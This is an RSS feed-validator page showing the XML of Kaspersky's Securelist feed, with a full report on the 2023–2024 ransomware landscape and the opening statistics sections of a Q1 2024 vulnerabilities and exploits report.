Congratulations!

[Valid RSS] This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

Source: https://securelist.com/feed/

  1. <?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
  2. xmlns:content="http://purl.org/rss/1.0/modules/content/"
  3. xmlns:wfw="http://wellformedweb.org/CommentAPI/"
  4. xmlns:dc="http://purl.org/dc/elements/1.1/"
  5. xmlns:atom="http://www.w3.org/2005/Atom"
  6. xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
  7. xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
  8. >
  9.  
  10. <channel>
  11. <title>Securelist</title>
  12. <atom:link href="https://securelist.com/feed/" rel="self" type="application/rss+xml" />
  13. <link>https://securelist.com</link>
  14. <description></description>
  15. <lastBuildDate>Wed, 08 May 2024 15:34:19 +0000</lastBuildDate>
  16. <language>en-US</language>
  17. <sy:updatePeriod>
  18. hourly </sy:updatePeriod>
  19. <sy:updateFrequency>
  20. 1 </sy:updateFrequency>
  21. <generator>https://wordpress.org/?v=6.5.2</generator>
  22.  
  23. <image>
  24. <url>https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png</url>
  25. <title>Securelist</title>
  26. <link>https://securelist.com</link>
  27. <width>32</width>
  28. <height>32</height>
  29. </image>
  30. <item>
  31. <title>State of ransomware in 2024</title>
  32. <link>https://securelist.com/state-of-ransomware-2023/112590/</link>
  33. <comments>https://securelist.com/state-of-ransomware-2023/112590/#respond</comments>
  34. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
  35. <pubDate>Wed, 08 May 2024 10:00:40 +0000</pubDate>
  36. <category><![CDATA[Publications]]></category>
  37. <category><![CDATA[Cybercrime Legislation]]></category>
  38. <category><![CDATA[Data Encryption]]></category>
  39. <category><![CDATA[LockBit]]></category>
  40. <category><![CDATA[Ransomware]]></category>
  41. <category><![CDATA[Financial threats]]></category>
  42. <category><![CDATA[Windows malware]]></category>
  43. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112590</guid>
  44.  
  45. <description><![CDATA[As Anti-Ransomware Day approaches, Kaspersky shares insights into the ransomware threat landscape and trends in 2023, and recent anti-ransomware activities by governments and law enforcement.]]></description>
  46. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" /></p><p><a href="https://securelist.com/modern-ransomware-groups-ttps/106824/" target="_blank" rel="noopener">Ransomware</a> attacks continue to be one of the biggest contemporary cybersecurity threats, affecting organizations and individuals alike on a global scale. From high-profile breaches in healthcare and industrial sectors – compromising huge volumes of sensitive data or halting production entirely – to attacks on small businesses that have become relatively easy targets, ransomware actors are expanding their sphere of influence. As we approach International Anti-Ransomware Day, we have analyzed the major ransomware events and trends. In this report, we share our observations, research, and statistics to shed light on the evolving ransomware threat landscape and its implications for cybersecurity.</p>
  47. <h2 id="ransomware-landscape-rise-in-targeted-groups-and-attacks">Ransomware landscape: rise in targeted groups and attacks</h2>
  48. <p>Kaspersky collected data on targeted ransomware groups and their attacks from multiple relevant public sources for the years 2022 and 2023, then filtered and validated it. The research reveals a 30% global increase in the number of targeted ransomware groups compared to 2022, with the number of known victims of their attacks rising by a staggering 71%.</p>
  49. <p>Unlike random attacks, these targeted groups focus on governments, high-profile organizations, or specific individuals within an organization. Moreover, most of them distribute their malware under the Ransomware-as-a-Service (RaaS) model, which involves a number of smaller groups (called affiliates) getting access to the ransomware for a subscription fee or a portion of the ransom. In the graph below, you can see the ransomware families that were most active in 2023.</p>
  50. <div id="attachment_112592" style="width: 967px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png" class="magnificImage"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-112592" class="size-full wp-image-112592" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png" alt="Most active ransomware families by number of victims, 2023" width="957" height="560" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png 957w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-300x176.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-768x449.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-598x350.png 598w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-740x433.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-479x280.png 479w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-800x468.png 800w" sizes="(max-width: 957px) 100vw, 957px" /></a><p id="caption-attachment-112592" class="wp-caption-text">Most active ransomware families by number of victims, 2023</p></div>
  51. <p>The ransomware most frequently encountered in organizations&#8217; systems in 2023 was <a href="https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/" target="_blank" rel="noopener">Lockbit 3.0</a>. The reason for its remarkable activity may be its builder leak in 2022. That led to various independent groups using the builder to create custom ransomware variants, which they then used to target organizations all over the world. The group itself also has a large affiliate network. Second was <a href="https://securelist.com/a-bad-luck-blackcat/106254/" target="_blank" rel="noopener">BlackCat/ALPHV</a>, which first appeared in December 2021. In December 2023, the FBI, together with other law enforcement agencies, <a href="https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant" target="_blank" rel="noopener">disrupted</a> BlackCat&#8217;s operations and seized several websites of the group. However, immediately after the operation, BlackCat <a href="https://therecord.media/alphv-blackcat-ransomware-seized-sites-onion-tor-darkweb-fbi" target="_blank" rel="noopener">stated</a> that it had &#8220;unseized&#8221; at least some of the sites. The US Department of State <a href="https://www.state.gov/u-s-department-of-state-announces-reward-offers-for-criminal-associates-of-the-alphv-blackcat-ransomware-variant/" target="_blank" rel="noopener">offers</a> a 10 million bounty for the group&#8217;s associates. The third most active ransomware in 2023 was <a href="https://thehipaaetool.com/lessons-from-the-moveit-data-breach/" target="_blank" rel="noopener">Cl0p</a>. This group managed to breach the managed file transfer system MOVEit to get to its customers&#8217; data. According to New Zealand security firm Emsisoft, as of December 2023, this breach had affected over 2500 organizations.</p>
  52. <h3 id="other-notable-ransomware-variants">Other notable ransomware variants</h3>
  53. <p>In our threat research practice, among the threats we analyze are various ransomware samples. This section shares brief descriptions of several noteworthy families that, although not the most active in 2023, are interesting in one way or another.</p>
  54. <ul>
  55. <li><strong>BlackHunt:</strong> Detected in late 2022 and updated in 2023, BlackHunt targets global victims using a C++ executable, which is based on Conti ransomware source code. It utilizes customizable attack vectors, including deceptive tactics like a fake Windows Update screen displayed to mask the file encryption process, and employs security measures for testing purposes, such as checking for &#8220;Vaccine.txt&#8221; before executing. If the malware author wants to test the executable without encrypting their own files, they create a Vaccine.txt file. If the malware finds this file in the system, it doesn&#8217;t proceed with encryption.</li>
  56. <li><strong>Rhysida:</strong> Emerging in May 2023, Rhysida is a new RaaS operation initially targeting <a href="https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/#rhysida" target="_blank" rel="noopener">Windows</a> but later <a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-rhysida" target="_blank" rel="noopener">expanding to Linux</a>. Both versions use AES and RSA algorithms for file encryption, and the ChaCha stream cipher in the key generation process. The ransomware also implements token-based access to its hidden service for enhanced secrecy.</li>
  57. <li><strong>Akira:</strong> A compact C++ ransomware compatible with both Windows and Linux, <a href="https://securelist.com/crimeware-report-fakesg-akira-amos/111483/#akira" target="_blank" rel="noopener">Akira</a> has impacted over 60 organizations across various sectors. It employs a single key for encryption; early versions featured an encryption flaw that made file decryption possible without the ransomware operators&#8217; knowledge. However, this flaw was fixed in recent variants, which are not decryptable at the time of writing this report. For victim communication, Akira utilizes a minimalistic jQuery Terminal-based hidden service.</li>
  58. <li><strong>Mallox:</strong> Also known as Fargo and TargetCompany, Mallox has been wreaking havoc since its appearance in May 2021. With an increase in attacks in 2023 and nearly 500 identified samples, it continues to evolve with frequent updates and an active affiliate program as of 2024. Operating through both clearnet and TOR servers, Mallox targets internet-facing MS SQL and PostgreSQL servers and spreads through malicious attachments. The most affected countries include Brazil, Vietnam, China, Saudi Arabia, and India.</li>
  59. <li><strong>3AM:</strong> A new RaaS variant, 3AM features a sophisticated command-line interface, and an &#8220;access key&#8221; feature for protection against automatic sandbox execution: to be executed, the ransomware requires an access key. As is the case with most human-operated ransomware, 3AM affiliates get an initial foothold in the target infrastructure using Cobalt Strike. In Cobalt Strike, they use the watermark option, which allows the attackers to uniquely identify beacon traffic associated with a specific Cobalt Strike team server. This may suggest that 3AM affiliates share access to the target with other ransomware groups, and use the watermark to separate their traffic from the others. The ransomware employs efficient file-processing techniques, such as reverse traversal (processing strings from the end to quickly identify file paths and extensions) and integration with the Windows API, and terminates various processes before encryption to complicate recovery efforts. Communication with victims is through a TOR-based hidden service, though with operational security misconfigurations such as real IP exposure.</li>
  60. </ul>
  61. <h2 id="trends-observed-in-our-incident-response-practice">Trends observed in our incident response practice</h2>
  62. <p>This section contains trends and statistics based on the incidents our incident response service dealt with in 2023. The figures in this section may differ from those obtained from public sources, because they don&#8217;t cover all ransomware-related incidents that occurred last year.</p>
  63. <p>According to our incident response team, in 2023, every third incident (33.3%) was related to ransomware, which remained the primary threat to all organizations, whatever sector of the economy or industry they belonged to.</p>
  64. <p>Another important trend observed in 2023: attacks via contractors and service providers, including IT services, became one of the top three attack vectors for the first time. This approach facilitates large-scale attacks with less effort, often going undetected until data leaks or encrypted data are discovered. When it comes to ransomware specifically, trusted relationship attacks were one of the four main initial infection vectors. The other three were: compromise of internet-facing applications, which accounted for 50% of all ransomware attacks; compromised credentials (40%), of which 15% were obtained as a result of brute force attacks; and phishing.</p>
  65. <p>Among the ransomware families most frequently encountered in our incident response practice in 2023 were Lockbit (27.78%), BlackCat (12.96%), Phobos (9.26%), and Zeppelin (9.26%). Most of the data encryption attacks ended within a day (43.48%) or days (32.61%). The rest lasted for weeks (13.04%), while only 10.87% lasted for more than a month. Practically all the long ransomware attacks (those lasting weeks and months), in addition to data encryption, also featured data leakage.</p>
  66. <h3 id="ransomware-groups-tactics-and-techniques">Ransomware groups&#8217; tactics and techniques</h3>
  67. <p>Ransomware groups have continued to employ previously identified strategies for intrusion, utilizing similar tools and techniques. Adversaries have targeted internet-facing applications vulnerable to remote command execution (RCE), such as those supported by vulnerable versions of log4j. Exploiting vulnerabilities in these applications, adversaries have gained unauthorized access and compromised infrastructures.</p>
  68. <p>Once exploitation is confirmed, adversaries typically proceed by manipulating local privileged accounts responsible for application execution. They execute commands to modify user passwords and upload a set of tools, such as Meterpreter and Mimikatz, to the compromised system. By executing Meterpreter and creating or modifying system processes, adversaries gain additional access and establish persistence on the compromised system.</p>
  69. <p>In some instances, adversaries exploit vulnerabilities in public-facing applications within the organization&#8217;s infrastructure and utilize tools like BloodHound and Impacket for lateral movement within networks and gaining knowledge of the target infrastructure. However, to evade endpoint controls, they have also adopted different techniques, such as using the Windows Command Shell to collect event logs and extract valid usernames.</p>
  70. <p>Additionally, adversaries leverage native Windows SSH commands for command and control (C2) communications and data exfiltration. After identifying paths to reach remote systems with internet access, they configure SSH backdoors and establish reverse tunneling for data exchange.</p>
  71. <p>Overall, ransomware groups demonstrate a sophisticated understanding of network vulnerabilities and utilize a variety of tools and techniques to achieve their objectives. The use of well-known security tools, exploitation of vulnerabilities in public-facing applications, and the use of native Windows commands highlight the need for robust cybersecurity measures to defend against ransomware attacks and domain takeovers.</p>
  72. <h2 id="ransomware-becoming-a-matter-of-national-and-international-security">Ransomware: becoming a matter of national and international security</h2>
  73. <p>Over the past few years, the impact of ransomware attacks on public and private organizations has escalated to the point of threatening national security. This growing threat has led to ransomware being highlighted in national cybersecurity strategies, annual reports from cybersecurity regulators, and intergovernmental discussions at forums like the <a href="https://estatements.unmeetings.org/estatements/12.1255/20231211100000000/Esyr02c2qUjw/lszA98NeSJ5l_en.pdf" target="_blank" rel="noopener">UN Open-ended Working Group (OEWG) on cybersecurity</a>. The frequency and disruptive character of ransomware attacks have become unsustainable for governments, prompting them to pool resources and develop both national and multi-country initiatives to combat ransomware groups.</p>
  74. <p>One notable initiative is the formation in 2021 of <a href="https://counter-ransomware.org/" target="_blank" rel="noopener">the international Counter Ransomware Initiative (CRI)</a>, which brings together 49 countries and INTERPOL. Through the CRI, there has been a concerted effort to share cybersecurity information, disrupt attackers&#8217; operations, and tackle the financial mechanisms that fuel ransomware attacks. CRI members have also endorsed a statement advocating against ransom payments by institutions under national government authority, signaling the need for a new global norm and standard around ransomware payments. Countries like Singapore and the United Kingdom have played pivotal roles within the CRI, focusing on understanding the ransomware payment ecosystem and advocating for policies that counter ransomware financing.</p>
  75. <p>Legislative measures and policy actions are central to the fight against ransomware. In the United States, legislation like <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/information-sharing/cyber-incident-reporting-critical-infrastructure-act-2022-circia" target="_blank" rel="noopener">the Cyber Incident Reporting for Critical Infrastructure Act of 2022</a> aims to enhance incident reporting and resilience against attacks. In early 2023, France implemented a <a href="https://www.legifrance.gouv.fr/jorf/article_jo/JORFARTI000047046789" target="_blank" rel="noopener">law</a> that conditioned insurance coverage on the prompt reporting of cybersecurity incidents.</p>
  76. <p>State agencies&#8217; reporting on ransomware indicates that fighting this threat is a priority for authorities. In its latest <a href="https://www.bsi.bund.de/DE/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html" target="_blank" rel="noopener">IT Security Report 2023, the BSI (Germany)</a> identifies ransomware as the biggest cybersecurity threat to Germany, noting the shift from &#8220;big game hunting&#8221; to targeting smaller companies and municipal administrations.</p>
  77. <p>Last but not least, law enforcement agencies around the globe are joining forces in operations aimed at dismantling ransomware networks. In 2023, international operations seized infrastructures of such ransomware groups as <a href="https://www.justice.gov/opa/pr/us-department-justice-disrupts-hive-ransomware-variant" target="_blank" rel="noopener">Hive</a>, <a href="https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant" target="_blank" rel="noopener">BlackCat</a>, and <a href="https://www.europol.europa.eu/media-press/newsroom/news/ragnar-locker-ransomware-gang-taken-down-international-police-swoop" target="_blank" rel="noopener">Ragnar</a>. Early 2024 saw Operation Cronos <a href="https://www.europol.europa.eu/media-press/newsroom/news/law-enforcement-disrupt-worlds-biggest-ransomware-operation" target="_blank" rel="noopener">disrupt</a> Lockbit and get access to their decryption keys, and in May 2024, the group&#8217;s leader <a href="https://nationalcrimeagency.gov.uk/news/lockbit-leader-unmasked-and-sanctioned" target="_blank" rel="noopener">was unmasked and sanctioned</a>. Although cybercriminals usually rebuild their infrastructure afterwards, these efforts at the very least make maintaining a ransomware operation much more expensive and cut into the groups&#8217; income by decrypting victims&#8217; data for free. These and other efforts underscore a comprehensive approach to fighting ransomware. By combining international cooperation, legislative action, and financial oversight, countries aim to mitigate the global threat and impact of ransomware attacks effectively.</p>
  78. <h2 id="ransomware-what-to-expect-in-2024">Ransomware – what to expect in 2024</h2>
  79. <p>As we look ahead to 2024, we observe a significant shift in the ransomware ecosystem. While many prominent ransomware gangs have disappeared, smaller and more elusive groups are emerging. This rise can be attributed to leaked source code and tools from disbanded or defunct larger groups.</p>
  80. <p>As officials discuss counter-ransomware measures and law enforcement authorities around the globe link up to combat cybercrime, ransomware operations are becoming increasingly fragmented. Larger, more coordinated groups are breaking down into smaller factions, making it more challenging for law enforcement to target them. Moreover, each of these smaller groups has less impact and is of less interest to law enforcement, and thus a reduced likelihood of being tracked and prosecuted, giving independent ransomware actors a higher chance of escaping arrest.</p>
  81. <p>In conclusion, ransomware attacks remain a significant and evolving threat in the realm of cybersecurity. From high-profile breaches affecting critical sectors to attacks on small businesses, the impact of ransomware continues to expand. As we reflect on the state of ransomware, several key observations and trends emerge.</p>
  82. <p>To mitigate the risk of ransomware attacks, individuals and organizations should prioritize cybersecurity measures.</p>
  83. <ul>
  84. <li>Use robust, properly-configured security solutions like <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext___" target="_blank" rel="noopener">Kaspersky NEXT</a>.</li>
  85. <li>Implement <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response" target="_blank" rel="noopener">Managed Detection and Response (MDR)</a> to proactively seek out threats.</li>
  86. <li>Disable unused services and ports to minimize the attack surface.</li>
  87. <li>Keep all systems and software up to date with regular updates and patches.</li>
  88. <li>Conduct regular penetration tests and vulnerability scanning to identify and address vulnerabilities promptly.</li>
  89. <li>Provide comprehensive cybersecurity training to employees to raise awareness of cyberthreats and best practices for mitigation.</li>
  90. <li>Establish and maintain regular backups of critical data, and test backup and recovery procedures regularly.</li>
  91. <li>Use <a href="https://www.kaspersky.com/enterprise-security/threat-intelligence" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> to keep track of the latest TTPs used by groups and adjust your detection mechanisms to catch these.</li>
  92. <li>Pay special attention to any &#8220;new&#8221; software being run and installed on systems within your network (including legitimate software).</li>
  93. </ul>
  94. ]]></content:encoded>
  95. <wfw:commentRss>https://securelist.com/state-of-ransomware-2023/112590/feed/</wfw:commentRss>
  96. <slash:comments>0</slash:comments>
  97. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-scaled.jpg" width="2672" height="1496"><media:keywords>full</media:keywords></media:content>
  98. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-1024x573.jpg" width="1024" height="573"><media:keywords>large</media:keywords></media:content>
  99. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-300x168.jpg" width="300" height="168"><media:keywords>medium</media:keywords></media:content>
  100. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  101. </item>
  102. <item>
  103. <title>Exploits and vulnerabilities in Q1 2024</title>
  104. <link>https://securelist.com/vulnerability-report-q1-2024/112554/</link>
  105. <comments>https://securelist.com/vulnerability-report-q1-2024/112554/#respond</comments>
  106. <dc:creator><![CDATA[Alexander Kolesnikov, Vitaly Morgunov]]></dc:creator>
  107. <pubDate>Tue, 07 May 2024 10:00:39 +0000</pubDate>
  108. <category><![CDATA[Publications]]></category>
  109. <category><![CDATA[Backdoor]]></category>
  110. <category><![CDATA[Browser]]></category>
  111. <category><![CDATA[Linux]]></category>
  112. <category><![CDATA[Microsoft Exchange]]></category>
  113. <category><![CDATA[Microsoft Office]]></category>
  114. <category><![CDATA[Microsoft Windows]]></category>
  115. <category><![CDATA[Targeted attacks]]></category>
  116. <category><![CDATA[Vulnerabilities]]></category>
  117. <category><![CDATA[Vulnerabilities and exploits]]></category>
  118. <category><![CDATA[Vulnerability Statistics]]></category>
  119. <category><![CDATA[Vulnerabilities and exploits]]></category>
  120. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112554</guid>
  121.  
  122. <description><![CDATA[The report provides vulnerability and exploit statistics, key trends, and analysis of interesting vulnerabilities discovered in Q1 2024.]]></description>
  123. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>We at Kaspersky continuously monitor the evolving cyberthreat landscape to ensure we respond promptly to emerging threats, equipping our products with detection logic and technology. Software vulnerabilities that threat actors can exploit or are already actively exploiting are a critical component of that landscape. In this report, we present a series of insightful statistical and analytical snapshots relating to the trends in the emergence of new vulnerabilities and exploits, as well as the most prevalent vulnerabilities being used by attackers. Additionally, we take a close look at several noteworthy vulnerabilities discovered in Q1 2024.</p>
  124. <h2 id="statistics-on-registered-vulnerabilities">Statistics on registered vulnerabilities</h2>
  125. <p>To facilitate the management of vulnerabilities, vendors can register these and assign CVE identifiers. All identifiers and related public information are published on <a href="https://cve.mitre.org" target="_blank" rel="noopener">https://cve.mitre.org</a> (at the time of writing, the site is in the process of migrating to a new domain, <a href="https://www.cve.org/" target="_blank" rel="noopener">https://www.cve.org/</a>). Although vendors often fail to register vulnerabilities, and the CVE list cannot be considered exhaustive, it does allow us to track certain trends. We analyzed data on registered software vulnerabilities and compared their quantities over the past five years.</p>
  126. <div class="js-infogram-embed" data-id="_/rvIDXYRQBafAdsv5iuRS" data-type="interactive" data-title="01 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
  127. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of newly registered CVEs, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091108/01-en-ru-es-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  128. <p>As the chart illustrates, the number of new vulnerabilities has been steadily increasing year over year. This can be attributed to several factors.</p>
  129. <p>Firstly, the growing popularity of bug bounty platforms and vulnerability discovery competitions has provided a major impetus to research in the field. As a result, vulnerability discoveries have been on the rise. This also leads to more vendors registering the discovered vulnerabilities, resulting in a growing number of CVEs.</p>
  130. <p>Secondly, companies developing popular software, operating systems, and programming languages are implementing more security solutions and new procedures that improve the performance of vulnerability monitoring in software. On the one hand, this leads to vulnerabilities being discovered more frequently; on the other, entire categories of vulnerabilities become obsolete. As a result, both threat actors and security researchers striving to stay ahead are actively searching for new types of vulnerabilities and creating automated services that allow for even more efficient detection.</p>
  131. <p>Finally, new applications appear with time as existing ones get updates and become more complex, spawning new vulnerabilities. With the rapid pace of technological evolution, the number of discovered vulnerabilities is likely to continue to grow year after year.</p>
  132. <p>It is important to note that different vulnerabilities pose different levels of security threats. In particular, some of them may be categorized as critical. We used the data in the list of registered CVEs and the results of internal reproducibility tests to calculate the share of critical vulnerabilities.</p>
  133. <div class="js-infogram-embed" data-id="_/q1XSTSE9SXKud94bFufN" data-type="interactive" data-title="02 EN Vulnerability report graphs" style="min-height:;"></div>
  134. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of newly registered CVEs and the percentage of critical CVEs in these, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091119/02-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  135. <p>As the chart shows, the growth in the number of critical vulnerabilities has been intermittent. In 2021 and 2022, the share of critical vulnerabilities among the total number was comparable, but it increased during the periods from 2019 through 2021 and from 2022 through 2023. The year 2023 was notable for a record number of critical vulnerabilities discovered in software. The percentage of critical vulnerabilities in the total number of registered ones remained high in Q1 2024. This once again emphasizes the importance of proper patch management and the need for security solutions capable of preventing vulnerability exploitation.</p>
  136. <h2 id="exploitation-statistics">Exploitation statistics</h2>
  137. <p>This section presents exploit statistics gathered from both public sources, such as registered CVEs, and our in-house telemetry.</p>
  138. <p>An exploit is a program containing data or executable code that takes advantage of one or more software vulnerabilities on a local or remote computer for malicious purposes. Software vulnerabilities that allow attackers to gain control over the target user&#8217;s system are of the highest value to exploit developers.</p>
  139. <p>Exploits can be created by malicious actors who sell their creations on underground forums or use them to their own ends. Additionally, enthusiasts, including participants of various bug bounty programs, develop exploits to stay ahead of adversaries and devise countermeasures.</p>
  140. <div id="attachment_112556" style="width: 947px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-112556" class="size-full wp-image-112556" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png" alt="A dark web buy ad for zero- and one-day exploits" width="937" height="326" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png 937w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-300x104.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-768x267.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-740x257.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-805x280.png 805w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-800x278.png 800w" sizes="(max-width: 937px) 100vw, 937px" /></a><p id="caption-attachment-112556" class="wp-caption-text">A dark web buy ad for zero- and one-day exploits</p></div>
  141. <h3 id="windows-and-linux-vulnerability-exploitation">Windows and Linux vulnerability exploitation</h3>
  142. <p>The charts below show the trends in the number of Linux and Windows users protected by Kaspersky products who encountered vulnerability exploits in 2023 and Q1 2024. The statistics are based on data from the Kaspersky Security Network, provided by our users voluntarily.</p>
  143. <div class="js-infogram-embed" data-id="_/mqB1DB4dRydD21CtOwRd" data-type="interactive" data-title="03 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
  144. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of Windows users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07095054/03-en-ru-es-vulnerability-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  145. <div class="js-infogram-embed" data-id="_/zVTq4mF5zUc1VcatXACX" data-type="interactive" data-title="04 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
  146. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of Linux users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07095107/04-en-ru-es-vulnerability-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  147. <p>As the charts demonstrate, the number of Windows users who experienced vulnerability exploitation remained roughly unchanged throughout 2023, whereas the number of affected Linux users increased steadily. It&#8217;s important to note that this doesn&#8217;t necessarily involve the same vulnerabilities in both cases. Some vulnerabilities quickly become obsolete, prompting threat actors to shift their focus to newer ones.</p>
  148. <p>Let&#8217;s illustrate the changes in the popularity of certain vulnerabilities using the example of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28831" target="_blank" rel="noopener">CVE-2023-28831</a> vulnerability in WinRAR.</p>
  149. <div class="js-infogram-embed" data-id="_/HLfi9KXTIUf4HlJj4Omw" data-type="interactive" data-title="05 EN Vulnerability report graphs" style="min-height:;"></div>
  150. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The popularity dynamics of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28831" target="_blank" rel="noopener">CVE-2023-28831</a> vulnerability in WinRAR, September 2023 — March 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091129/05-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  151. <p>The chart reveals that the vulnerability was quite popular almost immediately after it was registered in September 2023 but then gradually declined in relevance as users installed patches. This is just further evidence that malicious actors tend to take an interest in vulnerabilities as long as the number of users who have installed a fix is relatively small.</p>
  152. <h3 id="public-exploit-statistics">Public exploit statistics</h3>
  153. <p>The availability of an exploit, especially when accessible on public platforms like GitHub, is a key criterion in assessing the criticality of a vulnerability. We analyzed data on publicly available exploits for registered vulnerabilities.</p>
  154. <div class="js-infogram-embed" data-id="_/da7IeILEkOtbflqBLPR6" data-type="interactive" data-title="06 EN Vulnerability report graphs" style="min-height:;"></div>
  155. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of vulnerabilities and the percentage of those that have an exploit, 2019 — 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091139/06-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  156. <p>The statistics reveal an increase in the total number of exploits, encompassing both ready-to-use exploits and raw PoCs. The latter may be unstable, but they demonstrate that the vulnerability can be exploited and hold potential for future refinement. It&#8217;s worth noting that malicious actors seek both new exploits and modifications to existing ones, such as optimization for compatibility with multiple operating systems, integration of new data processing methods, and stability enhancements.</p>
